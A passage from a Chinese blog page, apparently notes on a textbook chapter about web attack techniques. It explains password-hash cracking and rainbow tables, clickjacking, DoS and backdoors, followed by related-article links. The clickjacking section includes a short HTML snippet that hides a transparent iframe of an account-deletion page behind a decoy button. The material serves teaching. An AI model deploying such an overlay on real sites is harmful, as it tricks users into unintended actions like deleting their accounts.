年)公布的非法访问行为的具体发生状况请参见<br> http://www.npa.go.jp/cyber/statics/h23/pdf040.pdf</p> </blockquote> <ul> <li>对己加密密码的破解<br> Web 应用在保存密码时,一般不会直接以明文的方式保存,通过散列函数做散列处理或加 salt 的手段对要保存的密码本身加密。那即使攻击者使用某些手段窃取密码数据,如果想要真正使用这些密码,则必须先通过解码等手段,把加密处理的密码还原成明文形式。<br> <a href="http://img.e-com-net.com/image/info8/8cd68de9df134621b4f19a4f5a11dccf.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/8cd68de9df134621b4f19a4f5a11dccf.jpg" alt="HTTP——十一、Web的攻击技术_第32张图片" width="650" height="385" style="border:1px solid black;"></a><br> 从加密过的数据中导出明文通常有以下几种方法。</li> <li> <ul> <li>通过穷举法·字典攻击进行类推</li> </ul> </li> <li> <ul> <li>彩虹表</li> </ul> </li> <li> <ul> <li>拿到密钥</li> </ul> </li> <li> <ul> <li>加密算法的漏洞</li> </ul> </li> </ul> <p><strong>通过穷举法·字典攻击进行类推</strong><br> 针对密码使用散列函数进行加密处理的情况,采用和穷举法或字典攻击相同的手法,尝试调用相同的散列函数加密候选密码,然后把计算出的散列值与目标散列值匹配,类推出密码。<br> <a href="http://img.e-com-net.com/image/info8/0125d89a4c3f472a8d7ea51f4461fff5.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/0125d89a4c3f472a8d7ea51f4461fff5.jpg" alt="HTTP——十一、Web的攻击技术_第33张图片" width="640" height="383" style="border:1px solid black;"></a><br> <strong>彩虹表</strong><br> 彩虹表(Rainbow Table)是由明文密码及与之对应的散列值构成的一张数据库表,是一种通过事先制作庞大的彩虹表,可在穷举法 • 字典攻击等实际破解过程中缩短消耗时间的技巧。从彩虹表内搜索散列值就可以推导出对应的明文密码。<br> <a href="http://img.e-com-net.com/image/info8/56116640e45c447a85cd435d10913aaa.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/56116640e45c447a85cd435d10913aaa.jpg" alt="HTTP——十一、Web的攻击技术_第34张图片" width="528" height="249" style="border:1px solid black;"></a><br> 为了提高攻击成功率,拥有一张海量数据的彩虹表就成了必不可少的条件。例如在 Free Rainbow Tables 网站上(http://www.freerainbowtables.com/en/tables2/)公布的一张由大小写字母及数字全排列的 1~8 位字符串对应的 MD5 散列值构成的彩虹表,其大小约为 1050 吉字节。<br> <strong>拿到密钥</strong><br> 使用共享密钥加密方式对密码数据进行加密处理的情况下,如果能通过某种手段拿到加密使用的密钥,也就可以对密码数据解密了。<br> <strong>加密算法的漏洞</strong><br> 考虑到加密算法本身可能存在的漏洞,利用该漏洞尝试解密也是一种可行的方法。但是要找到那些已广泛使用的加密算法的漏洞,又谈何容易,因此困难极大,不易成功。</p> <p>而 Web 应用开发者独立实现的加密算法,想必尚未经过充分的验证,还是很有可能存在漏洞的。</p> <h2>2、点击劫持</h2> <p>点击劫持(Clickjacking)是指利用透明的按钮或链接做成陷阱,覆盖在 Web 页面之上。然后诱使用户在不知情的情况下,点击那个链接访问内容的一种攻击手段。这种行为又称为界面伪装(UI Redressing)。<br> 已设置陷阱的 Web 页面,表面上内容并无不妥,但早已埋入想让用户点击的链接。当用户点击到透明的按钮时,实际上是点击了已指定透明属性元素的 iframe 页面。</p> <ul> <li>点击劫持的攻击案例<br> 下面以 SNS 网站的注销功能为例,讲解点击劫持攻击。利用该注销功能,注册登录的 SNS 用户只需点击注销按钮,就可以从SNS 网站上注销自己的会员身份。<br> <a href="http://img.e-com-net.com/image/info8/a4be7b0b31204895954c4282400524e6.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/a4be7b0b31204895954c4282400524e6.jpg" alt="HTTP——十一、Web的攻击技术_第35张图片" width="574" height="378" style="border:1px solid black;"></a><br> 攻击者在预料用户会点击的 Web 页面上设下陷阱。上图中钓鱼游戏页面上的 PLAY 按钮就是这类陷阱的实例。<br> 在做过手脚的 Web 页面上,目标的 SNS 注销功能页面将作为透明层覆盖在游戏网页上。覆盖时,要保证 PLAY 按钮与注销按钮的页面所在位置保持一致。</li> </ul> <blockquote> <p>iframe 页面中使用透明可点击按钮的示例</p> </blockquote> <pre><code class="prism language-dart"><span class="token operator"><</span>iframe id<span class="token operator">=</span><span class="token string-literal"><span class="token string">"target"</span></span> src<span class="token operator">=</span><span class="token string-literal"><span class="token string">"http://sns.example.jp/leave"</span></span> style<span class="token operator">=</span><span class="token string-literal"><span class="token string">"opacity:0;filter:alpha(opacity=0)"</span></span><span class="token operator">></span><span class="token operator"><</span><span class="token operator">/</span>iframe<span class="token operator">></span> <span class="token operator"><</span>button style<span class="token operator">=</span><span class="token string-literal"><span class="token string">"position:absolute;top:100;left:100;z-index:-1"</span></span><span class="token operator">></span>PLA </code></pre> <p>由于 SNS 网站作为透明层被覆盖,SNS 网站上处于登录状态的用户访问这个钓鱼网站并点击页面上的 PLAY 按钮之后,等同于点击了 SNS 网站的注销按钮。</p> <h2>3、Dos攻击</h2> <p>DoS 攻击(Denial of Service attack)是一种让运行中的服务呈停止状态的攻击。有时也叫做服务停止攻击或拒绝服务攻击。DoS 攻击的对象不仅限于 Web 网站,还包括网络设备及服务器等。<br> 主要有以下两种 DoS 攻击方式。</p> <ul> <li>集中利用访问请求造成资源过载,资源用尽的同时,实际上服务也就呈停止状态。</li> <li>通过攻击安全漏洞使服务停止。</li> </ul> <p>其中,集中利用访问请求的 DoS 攻击,单纯来讲就是发送大量的合法请求。服务器很难分辨何为正常请求,何为攻击请求,因此很难防止 DoS 攻击。<br> <a href="http://img.e-com-net.com/image/info8/f3dcfaa13997403fa23d6f18bafac65c.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/f3dcfaa13997403fa23d6f18bafac65c.jpg" alt="HTTP——十一、Web的攻击技术_第36张图片" width="590" height="383" style="border:1px solid black;"></a><br> 多台计算机发起的 DoS 攻击称为 DDoS 攻击(Distributed Denial of Service attack)。DDoS 攻击通常利用那些感染病毒的计算机作为攻击者的攻击跳板。</p> <h2>4、后门程序</h2> <p>后门程序(Backdoor)是指开发设置的隐藏入口,可不按正常步骤使用受限功能。利用后门程序就能够使用原本受限制的功能。<br> 通常的后门程序分为以下 3 种类型。</p> <ul> <li>开发阶段作为 Debug 调用的后门程序</li> <li>开发者为了自身利益植入的后门程序</li> <li>攻击者通过某种方法设置的后门程序</li> </ul> <p>可通过监视进程和通信的状态发现被植入的后门程序。但设定在 Web应用中的后门程序,由于和正常使用时区别不大,通常很难发现。</p> </div> </div> </div> </div> </div> <!--PC和WAP自适应版--> <div id="SOHUCS" sid="1689367760091557888"></div> <script type="text/javascript" src="/views/front/js/chanyan.js"></script> <!-- 文章页-底部 动态广告位 --> <div class="youdao-fixed-ad" id="detail_ad_bottom"></div> </div> <div class="col-md-3"> <div class="row" id="ad"> <!-- 文章页-右侧1 动态广告位 --> <div id="right-1" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div class="youdao-fixed-ad" id="detail_ad_1"> </div> </div> <!-- 文章页-右侧2 动态广告位 --> <div id="right-2" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div class="youdao-fixed-ad" id="detail_ad_2"></div> </div> <!-- 文章页-右侧3 动态广告位 --> <div id="right-3" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div class="youdao-fixed-ad" id="detail_ad_3"></div> </div> </div> </div> </div> </div> </div> <div class="container"> <h4 class="pt20 mb15 mt0 border-top">你可能感兴趣的:(计算机网络,HTTP,HCIP,http,前端,网络协议,计算机网络,网络,服务器,HCIP)</h4> <div id="paradigm-article-related"> <div class="recommend-post mb30"> <ul class="widget-links"> <li><a href="/article/1893721827373543424.htm" title="物联网数据采集平台【物联网毕业论文】" target="_blank">物联网数据采集平台【物联网毕业论文】</a> <span class="text-muted">算法与数据</span> <a class="tag" taget="_blank" href="/search/%E7%89%A9%E8%81%94%E7%BD%91/1.htm">物联网</a> <div>物联网技术与数据分析|物联网系统设计|模型构建✨专业领域:物联网系统架构设计智能设备与传感器网络数据采集与处理物联网大数据分析智能家居与工业物联网边缘计算与云计算物联网安全与隐私保护擅长工具:Python/R/Matlab数据分析与建模物联网平台与设备编程数据流与实时监控系统设计机器学习与预测模型应用物联网协议(MQTT,CoAP,HTTP)物联网数据可视化工具✅物联网专业题目与数据:物联网毕业论</div> </li> <li><a href="/article/1893721575199404032.htm" title="基于深度学习的股票短期趋势预测模型设计与实现【附代码】" target="_blank">基于深度学习的股票短期趋势预测模型设计与实现【附代码】</a> <span class="text-muted">算法与数据</span> <a class="tag" taget="_blank" href="/search/%E6%B7%B1%E5%BA%A6%E5%AD%A6%E4%B9%A0/1.htm">深度学习</a><a class="tag" taget="_blank" href="/search/%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD/1.htm">人工智能</a> <div>,我们首先对股票的基本交易数据进行了清洗和预处理,包括去除异常值、填补缺失值等。同时,我们还挖掘了多个可能影响股票价格走势的因子,如成交量、市盈率、市净率等,并将这些因子作为特征加入到数据集中。通过特征工程,我们进一步扩展了数据集,提高了模型的输入质量。在模型构建方面,我们采用了LSTM网络来处理时间序列数据。LSTM网络具有记忆功能,能够捕捉数据中的长期依赖关系,这对于股票价格走势的预测至关重要</div> </li> <li><a href="/article/1893720186914140160.htm" title="泷羽sec-网络基础之超文本协议与内外网划分 学习笔记" target="_blank">泷羽sec-网络基础之超文本协议与内外网划分 学习笔记</a> <span class="text-muted">Darker'K</span> <a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/%E7%AC%94%E8%AE%B0/1.htm">笔记</a> <div>声明!学习视频来自B站up主**泷羽sec**有兴趣的师傅可以关注一下,如涉及侵权马上删除文章,笔记只是方便各位师傅的学习和探讨,文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!!!有兴趣的小伙伴可以点击下面连接进入b站主页[B站泷羽sec](泷羽sec的个人空间-泷羽sec个人主页-哔哩哔哩视频)本章课程链接:黑客网络基础之超文本协议</div> </li> <li><a href="/article/1893720060044832768.htm" title="计算机网络应用层之文件传输协议——FTP(这一篇就够了)" target="_blank">计算机网络应用层之文件传输协议——FTP(这一篇就够了)</a> <span class="text-muted">jesesl</span> <a class="tag" taget="_blank" href="/search/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/1.htm">计算机网络</a><a class="tag" taget="_blank" href="/search/ftp/1.htm">ftp</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%8D%8F%E8%AE%AE/1.htm">网络协议</a> <div>目录文件传输协议:FTPFTP传输文件的过程FTP传输文模式FTP配置文件传输协议:FTPHTTP和FTP都是文件传输协议,但FTP使用两个并行的TCP连接来传输文件,一个是控制连接(controlconnection),一个是数据连接(dataconnection)。控制连接用于在两个主机之间传输控制信息,如用户标识、口令、改变远程目录的命令。数据连接用于实际传输一个文件。也称FTP的控制信息是</div> </li> <li><a href="/article/1893719933750145024.htm" title="【数据序列化协议】Protocol Buffers" target="_blank">【数据序列化协议】Protocol Buffers</a> <span class="text-muted">茉菇</span> <a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a> <div>一、为什么需要序列化?数据跨平台/语言交互:不同编程语言(如Java、Python、Go)的数据结构不兼容,序列化提供统一的数据表示。例如:Java的HashMap和Python的dict需转换为通用格式(如JSON、Protobuf)才能通信。网络传输优化:原始内存中的对象包含指针、元数据等冗余信息,无法直接传输。序列化后数据体积更小,减少带宽占用,提升传输效率。持久化存储:将对象转换为字节流或</div> </li> <li><a href="/article/1893719555679776768.htm" title="【漏洞复现】泛微OA E-Cology WorkflowServiceXml Sql注入" target="_blank">【漏洞复现】泛微OA E-Cology WorkflowServiceXml Sql注入</a> <span class="text-muted">0x0000001</span> <a class="tag" taget="_blank" href="/search/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/1.htm">漏洞复现</a><a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a><a class="tag" taget="_blank" href="/search/web/1.htm">web</a><a class="tag" taget="_blank" href="/search/web%E6%BC%8F%E6%B4%9E/1.htm">web漏洞</a><a class="tag" taget="_blank" href="/search/%E6%BC%8F%E6%B4%9E/1.htm">漏洞</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a> <div>免责声明:本文内容旨在提供有关特定漏洞或安全漏洞的信息,以帮助用户更好地了解可能存在的风险。公布此类信息的目的在于促进网络安全意识和技术进步,并非出于任何恶意目的。阅读者应该明白,在利用本文提到的漏洞信息或进行相关测试时,可能会违反某些法律法规或服务协议。同时,未经授权地访问系统、网络或应用程序可能导致法律责任或其他严重后果。作者不对读者基于本文内容而产生的任何行为或后果承担责任。读者在使用本文所</div> </li> <li><a href="/article/1893719176791519232.htm" title="phpcms set inc.php,phpcms V9 sql注入漏洞测试" target="_blank">phpcms set inc.php,phpcms V9 sql注入漏洞测试</a> <span class="text-muted">朱娟娟</span> <div>phpcmsV9版本存在SQL注入漏洞,漏洞复现如下0x00以GET方式访问如下链接,得到返回包里mvbpqw_siteid值:http://127.0.0.1/index.php?m=wap&c=index&a=init&siteid=10x01构造SQL语句,将0x00中的mvbpqw_siteid值代入下面链接,以POST方式发起请求0x02将0x01步中的json值代入下面链接中,以POS</div> </li> <li><a href="/article/1893718016118550528.htm" title="腾讯 tRPC-Go 教学——(5)filter、context 和日志组件" target="_blank">腾讯 tRPC-Go 教学——(5)filter、context 和日志组件</a> <span class="text-muted"></span> <a class="tag" taget="_blank" href="/search/go%E8%85%BE%E8%AE%AFrpchttp/1.htm">go腾讯rpchttp</a> <div>本文咱们来介绍一下在tRPC中的filter机制、context用法,以及在相关机制上可以实现的tracinglog能力。说实话,这一部份是我个人最不喜欢的tRPC的实现模式,不过这不妨碍咱们使用它——只要把它封装成让人更为舒服的模式也未尝不可。系列文章腾讯tRPC-Go教学——(1)搭建服务腾讯tRPC-Go教学——(2)trpcHTTP能力腾讯tRPC-Go教学——(3)微服务间调用腾讯tRP</div> </li> <li><a href="/article/1893716531242659840.htm" title="DeepSeek学习教程 从入门到精通pdf下载:快速上手 DeepSeek" target="_blank">DeepSeek学习教程 从入门到精通pdf下载:快速上手 DeepSeek</a> <span class="text-muted">不会编程的程序猿ᅟ</span> <a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a> <div>下载链接:DeepSeek从入门到精通(清华大学).pdf链接:https://pan.baidu.com/s/1Ym0-_x9CrFHFld9UiOdA5A提取码:2ebc一、DeepSeek简介DeepSeek是一款由中国团队开发的高性能大语言模型,具备强大的推理能力和对中文的深刻理解。它广泛应用于智能办公、教育辅助、编程开发、商业分析等领域,支持自然语言交互,用户无需复杂提示词即可获得高质量</div> </li> <li><a href="/article/1893715648773681152.htm" title="DeepSeek 与网络安全:AI 在网络安全领域的应用与挑战" target="_blank">DeepSeek 与网络安全:AI 在网络安全领域的应用与挑战</a> <span class="text-muted">一ge科研小菜菜</span> <a class="tag" taget="_blank" href="/search/%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD/1.htm">人工智能</a><a class="tag" taget="_blank" href="/search/%E8%BF%90%E7%BB%B4/1.htm">运维</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a> <div>个人主页:一ge科研小菜鸡-CSDN博客期待您的关注1.引言在当今数字化时代,网络安全已成为国家、企业和个人面临的重要挑战。从传统的病毒、木马攻击,到高级持续性威胁(APT)、零日漏洞和供应链攻击,网络威胁的形式日益复杂。与此同时,人工智能(AI)技术的快速发展正在为网络安全提供全新的解决方案,而DeepSeek作为AI领域的新兴力量,也正在探索如何利用深度学习和大规模语言模型(LLM)加强网络安</div> </li> <li><a href="/article/1893714514306723840.htm" title="历年大厂校招 网络安全面试题(80+经验贴)" target="_blank">历年大厂校招 网络安全面试题(80+经验贴)</a> <span class="text-muted">go_to_hacker</span> <a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a> <div>《网安面试指南》http://mp.weixin.qq.com/s?__biz=MzkwNjY1Mzc0Nw==&mid=2247484339&idx=1&sn=356300f169de74e7a778b04bfbbbd0ab&chksm=c0e47aeff793f3f9a5f7abcfa57695e8944e52bca2de2c7a3eb1aecb3c1e6b9cb6abe509d51f&sce</div> </li> <li><a href="/article/1893713505551446016.htm" title="tcp udp区别" target="_blank">tcp udp区别</a> <span class="text-muted">有趣的难受</span> <a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/udp/1.htm">udp</a><a class="tag" taget="_blank" href="/search/tcp%2Fip/1.htm">tcp/ip</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a> <div>tcp和udp的区别有:1、udp是无连接的,tcp是面向连接的;2、udp是不可靠传输,tcp是可靠传输;3、udp是面向报文传输,tcp是面向字节流传输。UDPUDP协议全称是用户数据报协议,在网络中它与TCP协议一样用于处理数据包,是一种无连接的协议。在OSI模型中,在第四层——传输层,处于IP协议的上一层。UDP有不提供数据包分组、组装和不能对数据包进行排序的缺点,也就是说,当报文发送之后</div> </li> <li><a href="/article/1893712874379997184.htm" title="前端 fetch API 调用 Tushare 的数据接口获取免费的基金股票信息数据" target="_blank">前端 fetch API 调用 Tushare 的数据接口获取免费的基金股票信息数据</a> <span class="text-muted">匹马夕阳</span> <a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E5%B7%A5%E5%85%B7/1.htm">开发工具</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E6%BA%90/1.htm">开源</a> <div>要在前端使用JavaScript的fetchAPI调用Tushare的数据接口,您需要遵循以下步骤:1.注册Tushare账号并获取Token首先,访问Tushare官网注册账号。注册成功后,登录账号,在个人中心获取您的APIToken。2.构建请求参数Tushare的API接口采用POST请求方式,参数需要以JSON格式传递。以下是一个示例请求参数:{"api_name":"stock_basi</div> </li> <li><a href="/article/1893712874791038976.htm" title="DNS (Domain Name System) - 域名系统" target="_blank">DNS (Domain Name System) - 域名系统</a> <span class="text-muted">dlz0836</span> <a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/tcp%2Fip/1.htm">tcp/ip</a> <div>DNS(域名系统)是互联网中的一个关键系统,负责将人类易于记忆的域名(如www.example.com)转换为计算机能理解的IP地址(如192.168.1.1)。DNS使得我们不需要记住一长串数字的IP地址,而只需使用简洁的域名即可访问网站或网络服务。一、DNS基本概念1.域名(DomainName)域名是互联网中标识一个特定计算机或网络服务的名称,分为多个级别。最常见的顶级域名(TLD)包括.c</div> </li> <li><a href="/article/1893708590397583360.htm" title="组播通信的特点" target="_blank">组播通信的特点</a> <span class="text-muted">Carrot_ly</span> <a class="tag" taget="_blank" href="/search/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/1.htm">计算机网络</a> <div>组播(Multicast)是一种网络通信方式,允许一个发送者将数据同时传输给多个接收者,而不需要为每个接收者单独发送数据副本。组播具有以下主要特征:###1.**一对多通信**-组播支持一个发送者向多个接收者发送数据,适用于需要同时向多个目标传输相同数据的场景,如视频会议、在线直播等。###2.**高效的带宽利用**-组播只在网络分支点复制数据,减少了带宽消耗,避免了单播中为每个接收者单独发送数据</div> </li> <li><a href="/article/1893707706720645120.htm" title="泷羽sec---超文本协议与内外网划分" target="_blank">泷羽sec---超文本协议与内外网划分</a> <span class="text-muted">是山然呀</span> <a class="tag" taget="_blank" href="/search/%E6%B3%B7%E7%BE%BDsec--%E7%BA%A2%E9%98%9F%E4%BB%8E0%E5%88%B01/1.htm">泷羽sec--红队从0到1</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a> <div>http协议HTTP协议概述HTTP(HyperTextTransferProtocol)是用于分布式、协作式和动态Web的核心通信协议。它定义了浏览器和Web服务器之间如何传输超文本或文件。HTTP是一个无状态协议,这意味着每个请求和响应都是独立的,不依赖于前后请求的状态。HTTP版本HTTP/0.9互联网发展初期,对网页的需求较为简单,主要是纯文本内容的传输。http/0.9特点:1.只支持G</div> </li> <li><a href="/article/1893706824452993024.htm" title="Java Web开发" target="_blank">Java Web开发</a> <span class="text-muted">yourkin666</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a> <div>JavaWeb开发Java部分:面向对象后,注重学集合,抛异常,泛型,线程,反射,注解【Java零基础视频教程(适合Java基础,Java入门)老杜Java13版】https://www.bilibili.com/video/BV1mE411x7Wt?vd_source=4543341eea15096fa471f9067cc841ff【【零基础快速学Java】韩顺平零基础30天学会Java】htt</div> </li> <li><a href="/article/1893705943082921984.htm" title="红队-网络基础(上-超文本协议与内外网划分)" target="_blank">红队-网络基础(上-超文本协议与内外网划分)</a> <span class="text-muted">在校大two学生</span> <a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a> <div>声明通过学习泷羽sec的个人空间-泷羽sec个人主页-哔哩哔哩视频,做出的文章如涉及侵权马上删除文章笔记的只是方便各位师傅学习知识,以下网站只涉及学习内容,其他的都与本人无关,切莫逾越法律红线,否则后果自负一.http协议简介HTTP协议是HypertextTransferProtocol(也称为超文本传输协议)的缩写,是用于从万维网(www:worldwideweb)服务器传输超文本到本地浏览器</div> </li> <li><a href="/article/1893704557540732928.htm" title="深信服技服工程师面试题" target="_blank">深信服技服工程师面试题</a> <span class="text-muted">go_to_hacker</span> <a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a><a class="tag" taget="_blank" href="/search/mysql/1.htm">mysql</a><a class="tag" taget="_blank" href="/search/%E6%9C%8D%E5%8A%A1%E5%99%A8/1.htm">服务器</a> <div>《网安面试指南》https://mp.weixin.qq.com/s/RIVYDmxI9g_TgGrpbdDKtA?token=1860256701&lang=zh_CNs5000篇网安资料库https://mp.weixin.qq.com/s?__biz=MzkwNjY1Mzc0Nw==&mid=2247486065&idx=2&sn=b30ade8200e842743339d428f41447</div> </li> <li><a href="/article/1893703423191216128.htm" title="DNS, domain name system" target="_blank">DNS, domain name system</a> <span class="text-muted">yourkin666</span> <a class="tag" taget="_blank" href="/search/%E8%AE%A1%E7%BD%91%E5%85%AB%E8%82%A1/1.htm">计网八股</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E6%9C%8D%E5%8A%A1%E5%99%A8/1.htm">服务器</a><a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a> <div>DNS是一种应用层协议和http/https是同一等级的其传输层主要用的是udp,也可能用tcpDNS协议完成的作用:查域名对应的ipDNS服务器完成的作用:存储域名->ip的映射DNS服务器有三个等级:根DNS,顶级域DNS,权威DNS过一遍DNS协议的运作过程1.用户请求-用户在浏览器中输入一个网址(例如`www.example.com`)-浏览器首先检查浏览器缓存,看看是否已有该域名的IP地</div> </li> <li><a href="/article/1893701531077767168.htm" title="Docker安装Centos" target="_blank">Docker安装Centos</a> <span class="text-muted">卑微的小鬼</span> <a class="tag" taget="_blank" href="/search/docker/1.htm">docker</a><a class="tag" taget="_blank" href="/search/centos/1.htm">centos</a><a class="tag" taget="_blank" href="/search/%E5%AE%B9%E5%99%A8/1.htm">容器</a> <div>第一步:安装镜像启动之后,修改网络配置echo“nameserver8.8.8.8”>/etc/resolv.confecho“nameserver1.1.1.1”>>/etc/resolv.conf第二步:修改镜像源配置/etc/yum.repos.d涉及三个文件可以提前做好备份(1)CentOS-Linux-AppStream.repo(2)CentOS-Linux-Extras.repo(3</div> </li> <li><a href="/article/1893701403071803392.htm" title="什么是RPC,和HTTP有什么区别?" target="_blank">什么是RPC,和HTTP有什么区别?</a> <span class="text-muted">IsToRestart</span> <a class="tag" taget="_blank" href="/search/rpc/1.htm">rpc</a><a class="tag" taget="_blank" href="/search/http/1.htm">http</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%8D%8F%E8%AE%AE/1.htm">网络协议</a> <div>RPC是RemoteProcedureCall的缩写,译为远程过程调用。要想实现RPC通常需要包含传输协议和席列化协议的实现。而我们熟知的HTTP,他的中文名叫超文本传输协议,所以他就是一种传输协议。所以,我们可以认为RPC和HTTP并不是同一个维度的两个概念。只不过他们都是可以作为远程调用的,所以经常拿来对比。RPC的具体实现上,可以像HTTP一样,基于TCP协议来实现,也可以直接基于HTTP协</div> </li> <li><a href="/article/1893698250792300544.htm" title="WPF 编译功能命名空间" target="_blank">WPF 编译功能命名空间</a> <span class="text-muted">GhostKINGC</span> <a class="tag" taget="_blank" href="/search/WPF%E6%95%85%E4%BA%8B%E6%A8%A1%E5%BC%8F%28%E6%A0%87%E5%87%86%E7%89%88%29/1.htm">WPF故事模式(标准版)</a><a class="tag" taget="_blank" href="/search/wpf/1.htm">wpf</a><a class="tag" taget="_blank" href="/search/c%23/1.htm">c#</a><a class="tag" taget="_blank" href="/search/.net/1.htm">.net</a><a class="tag" taget="_blank" href="/search/microsoft/1.htm">microsoft</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a> <div>本节我们来关注到XAML的编译功能命名空间。xmlns声明时,有一个命名空间的映射前缀为x:,其指的是XAML的首字母。这个命名空间是专门写给XAML编译器看的,用来引导编译器将XAML代码编译成CLR代码的编译功能命名空间。下面为大家简单介绍编译功能命名空间中常见常用的功能。4.1XAML命名空间概述一般WPF程序中都会包含有一个映射前缀为x的命名空间,其声明语句为xmlns:x="http:/</div> </li> <li><a href="/article/1893696861588484096.htm" title="使用GitHub Actions 自动化打包部署前端到腾讯云服务器" target="_blank">使用GitHub Actions 自动化打包部署前端到腾讯云服务器</a> <span class="text-muted">要傻了</span> <a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF%E8%87%AA%E5%8A%A8%E5%8C%96%E9%83%A8%E7%BD%B2/1.htm">前端自动化部署</a><a class="tag" taget="_blank" href="/search/%E8%87%AA%E5%8A%A8%E5%8C%96/1.htm">自动化</a><a class="tag" taget="_blank" href="/search/github/1.htm">github</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E8%85%BE%E8%AE%AF%E4%BA%91/1.htm">腾讯云</a> <div>一、前端配置:1.在GitHub上进入选择的库,点击Actions下创建一个配置文件自动生成main.yml文件2.main.yml配置文件内容#ThisisabasicworkflowtohelpyougetstartedwithActionsname:browser-home-page#Controlswhentheworkflowwillrunon:#Triggerstheworkflowo</div> </li> <li><a href="/article/1893691317494542336.htm" title="深入探索连续变量量子神经网络:开启量子计算新纪元" target="_blank">深入探索连续变量量子神经网络:开启量子计算新纪元</a> <span class="text-muted">倪姿唯Kara</span> <div>深入探索连续变量量子神经网络:开启量子计算新纪元quantum-neural-networksThisrepositorycontainsthesourcecodeusedtoproducetheresultspresentedinthepaper"Continuous-variablequantumneuralnetworks".Duetosubsequentinterfaceupgrades,</div> </li> <li><a href="/article/1893691191094996992.htm" title="Qt/C++音视频开发-本地摄像头推流/桌面推流/文件推流/监控推流" target="_blank">Qt/C++音视频开发-本地摄像头推流/桌面推流/文件推流/监控推流</a> <span class="text-muted">鱼弦</span> <a class="tag" taget="_blank" href="/search/Qt%E5%AD%A6%E4%B9%A0%E4%B8%8E%E5%AE%9E%E8%B7%B5/1.htm">Qt学习与实践</a><a class="tag" taget="_blank" href="/search/%E9%9F%B3%E8%A7%86%E9%A2%91%E5%BC%80%E5%8F%91%E7%B3%BB%E5%88%97%E5%AE%9E%E8%B7%B5/1.htm">音视频开发系列实践</a><a class="tag" taget="_blank" href="/search/qt/1.htm">qt</a><a class="tag" taget="_blank" href="/search/c%2B%2B/1.htm">c++</a><a class="tag" taget="_blank" href="/search/%E9%9F%B3%E8%A7%86%E9%A2%91/1.htm">音视频</a> <div>Qt/C++音视频开发-本地摄像头推流/桌面推流/文件推流/监控推流介绍Qt/C++音视频开发是一种结合使用Qt框架和C++语言进行音视频处理与传输的技术。通过这种技术,可以实现本地摄像头推流、桌面推流、文件推流以及监控推流等功能。这些应用在视频会议、远程教育、在线直播等场景中非常常见。应用使用场景本地摄像头推流:用于将本地摄像头采集的视频数据进行实时编码并通过网络传输。桌面推流:用于捕获用户桌面</div> </li> <li><a href="/article/1893686654288326656.htm" title="MuseTalk:利用潜在空间进行高质量实时唇形同步" target="_blank">MuseTalk:利用潜在空间进行高质量实时唇形同步</a> <span class="text-muted">楠哥聊AI</span> <a class="tag" taget="_blank" href="/search/%E8%AE%A1%E7%AE%97%E6%9C%BA%E8%A7%86%E8%A7%89/1.htm">计算机视觉</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E5%AD%97%E4%BA%BA/1.htm">数字人</a><a class="tag" 